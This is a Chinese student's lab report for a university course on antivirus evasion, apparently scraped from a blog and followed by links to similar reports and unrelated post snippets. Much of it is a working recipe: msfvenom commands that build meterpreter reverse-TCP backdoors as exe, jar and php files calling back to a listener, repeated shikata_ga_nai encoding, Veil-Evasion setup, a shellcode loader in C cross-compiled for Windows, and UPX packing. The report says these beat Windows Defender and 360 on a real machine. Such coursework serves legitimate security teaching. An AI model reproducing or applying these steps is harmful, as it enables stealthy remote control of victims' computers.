实践内容(3.5分)

1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程(1分)

1.2 通过组合应用各种技术实现恶意代码免杀(0.5分)

(如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。)

1.3 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(加分0.5)

2.

基础问题回答

(1)杀软是如何检测出恶意代码的?

检测特征码、启发式恶意软件检查和行为。

(2)免杀是做什么?

通过一些手段伪装使恶意代码免遭杀软查杀。

(3)免杀的基本方法有哪些?

有msfvenom编码、使用veil-evasion等重写恶意代码、利用shellcode生成可执行文件、加壳等方法或者更高级的特征码修改包括文件特征码修改和内存特征码修改。

实验过程

任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧;

1、使用msf编码器

使用命令生成后门程序

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.70.131 LPORT=5231 -f exe > wyhy.exe



将生成的程序上传到virus total检测



上传virscan检测



使用msf编码器对后门程序编码10次

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.70.131 LPORT=5231 -f exe > wyhy-10.exe



然后再传到virus total上检测



上传virscan检测

2、使用msfvenom生成jar

使用命令生成.jar包

msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.70.131 lport=5231 x> 5231_backdoor.jar

上传virscan检测

3、使用msfvenom生成php

使用命令生成php文件

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.70.131 LPORT=5231 x> 5231_backdoor.php

上传virscan检测



(居然只有一个检测出来了,是谁呢?)



(卡巴斯基,牛皮!乌拉!!!(破音!))

4、使用veil-evasion

安装这个veil真的是,遇到提示别选Y手动安装,直接s(silent)静默安装,系统决定,一切随缘,手动安装的下场就是这样( ⬜ ⬜ ⬜? ⬜ ⬜。 ⬜ ⬜ ⬜!)



如果安装失败的,可以去usr/share/veil/config 下运行setup.sh 重新安装



最后安装成功的输入veil会有如下界面,然后输入use evasion进入evil-evasion输入命令use c/meterpreter/rev_tcp.py进入配置界面

set LHOST 192.168.70.131

set LPORT 5231

options

输入generate生成文件,接着输入你想要playload的名字



然后文件保存在/var/lib/veil/output/compiled/下,将生成文件提交扫描



任务二:Linux平台交叉编译Windows应用

5、利用shellcode编程

先执行shellcode生成命令得到shellcode



然后创建个.c文件将shellcode代码注入

“shellcode”

int main()

{

int (func)() = (int()())buf;

func();

}

执行i686-w64-mingw32-g++ 20165231.c -o 20165231.exe生成可执行的后门程序

然后上传测一下



然后拖到主机上测试,被检测出禁止运行并且Windows defender自动清理掉了(我的电脑早在三年前就卸载了360,电脑管家之类的,三年来的苟活凭借的就是一身正气加上微软自带的Windows Defender,我觉得那些东西不会让我电脑比这个更安全只会让它更!!!)



6.加壳测试

使用c+shellcode+加压缩壳

实验环境:被控机是win10实体机,没有360和腾讯电脑管家,微软自带Windows defender防火墙杀毒全开。

原理:将shellcode替换到以上代码的数组后给编译生成的EXE文件加壳中达到免杀效果

使用压缩壳(UPX)upx 20165231.exe -o wyhy5231.exe然后放到主机测试

放着不动或者用杀毒工具扫描就没有报警,一旦运行直接警告,并且直接被删



好的我错了,我以为就这么通过了没几分钟它就不见了!!!???系统又悄悄启动扫描一遍然后偷偷把文件给删了,然后再次放进主机共享文件夹就有危险报警了



为了完成反弹回连给他白名单吧,但是………………



好吧只有整个文件夹给设置为白名单吧(其实并没啥用,还是会被删,然后去威胁详细表里面手动恢复)

最后按照上次实验的步骤,我还是控制了我的win10主机,并且拍了个照,Windows defender也没有再干预。



任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本

免杀方法:先用msfvenom生成shellcode,再使用压缩壳进行加壳。

实验环境:对方电脑为 win7实体机,360 11.5.0.2002

本机打开msf控制台,开始监听,受控机运行后门程序


开启杀软能绝对防止电脑中恶意代码吗?

不能,此次简单的实验都逃过一劫(虽然有些地方暂时启用了白名单),高手总会想办法模拟一些正常软件的特征然后不断加壳加密或者更加高级的手段逃过杀软的查杀。

实验中遇到的问题

1、安装veil-evasion过程中出现很多弹窗提示你安装,但是里面的字却又是方框,编码错误显示不出来。

解决:在安装之除就选择s静默安装,一切由系统自己设置安排。

2、虚拟机ping不通别的实体机

解决:把虚拟机网卡设置改为桥接模式就可以了

实验感想

本次实验很长,很不好做,特别是veil,安装时间长,出错排查困难。经过这次实验我也认识到杀软也不是万能的,总会有病毒库里没出现过的新鲜玩意逃过一劫。想要电脑的安全就要做到自己不主动浏览不安全网站,不去下载不明软件,再加上杀软的一些防火墙功能,对于我们普通人来说还是很安全的。其次身边同学的实验也让我感受到360 和安全管家真是越来越** 了,好好一台电脑装了这玩意儿就卡卡卡死了!

2018-2019-2 网络对抗技术 20165231 Exp3 免杀原理与实践的更多相关文章

  1. 2018-2019-2 20165315 《网络对抗技术》Exp3 免杀原理与实践

    2018-2019-2 20165315 <网络对抗技术>Exp3 免杀原理与实践 一.实验内容 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion ...

  2. 2018-2019-2 网络对抗技术 20165317 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165317 Exp3 免杀原理与实践 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用 ...

  3. 2018-2019-2 网络对抗技术 20165318 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165318 Exp3 免杀原理与实践 免杀原理及基础问题回答 实验内容 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil- ...

  4. 2018-2019-2 网络对抗技术 20165232 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp3 免杀原理与实践 免杀原理及基础问题回答 一.免杀原理 一般是对恶意软件做处理,让它不被杀毒软件所检测.也是渗透测试中需要使用到的技术. ...

  5. 2018-2019-2 网络对抗技术 20165237 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165237 Exp3 免杀原理与实践 一.实践目标 1.1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳 ...

  6. 2018-2019-2 网络对抗技术 20165221 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165221 Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 主要依托三种恶意软件检测机制. 基于特征码的检测:一段特征码就是一段或者多 ...

  7. 2018-2019-2 网络对抗技术 20165325 Exp3 免杀原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp3 免杀原理与实践 实验内容(概要) 一.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己 ...

  8. 2018-2019-2 网络对抗技术 20165206 Exp3 免杀原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp3 免杀原理与实践 - 实验任务 1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己 ...

  9. 2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践

    2018-2019-3 网络对抗技术 20165235 Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 1.对某个文件的特征码进行分析,(特征码就是一类恶意文件中经常出现的一段代 ...

随机推荐

  1. TypeError: argument 1 must be an integer, not _subprocess_handle/OSError: [WinError 87]

    Error Msg: Traceback (most recent call last): File "c:\python27\lib\site-packages\celery\worker ...

  2. 三分钟明白 Activiti工作流 -- java运用

    原文地址:https://blog.csdn.net/jiangyu1013/article/details/73250902 一. 什么是工作流 以请假为例,现在大多数公司的请假流程是这样的 员工打 ...

  3. 501. Find Mode in Binary Search Tree

    Given a binary search tree (BST) with duplicates, find all the mode(s) (the most frequently occurred ...

  4. js中uuid不被识别

    后台传了uuid值给前台,然后js报错 原因:反正就是js不认你这个字符串,他觉得你这是应该是数字,但是后面想了想,也不是数字啊,然后就不认了. 解决办法:告诉他,为夫这里是字符串.拼接html的时候 ...

  5. ArrayBlockingQueue源码分析

    ArrayBlockingQueue是一个基于数组实现的有界的阻塞队列. 属性 //底层存储元素的数组.为final说明一旦初始化,容量不可变,所以是有界的. final Object[] items ...

  6. react-navigation使用之嵌套和跳转

    1. 新版react-native已经将react-navigation作为官方版本发布,基础Demo可以从官方网站获得,比较困扰的问题是组件的嵌套和第二.第三页面的跳转. 2. 组件嵌套问题: 要在 ...

  7. VUE项目中使用mint-ui框架总结

    针对PC端,element-ui可谓是首选了,UI体验效果很好. element-ui 框架官网:http://element.eleme.io/#/zh-CN/component/installat ...

  8. Mac下查看已安装的jdk版本及其安装目录

    1.打开终端,输入:/usr/libexec/java_home -V 注意:输入命令参数区分大小写(-v是不对的,必须是-V) 2.如图:为输入命令: 当前Mac已安装jdk目录: Mac默认使用的 ...

  9. opencv+codeblocks +anaconda

    study from : https://www.jianshu.com/p/c16b7c870356 #include <cstdio> #include <cstdlib> ...

  10. python爬虫学习笔记

    爬虫的分类 1.通用爬虫:通用爬虫是搜索引擎(Baidu.Google.Yahoo等)“抓取系统”的重要组成部分.主要目的是将互联网上的网页下载到本地,形成一个互联网内容的镜像备份. 简单来讲就是尽可 ...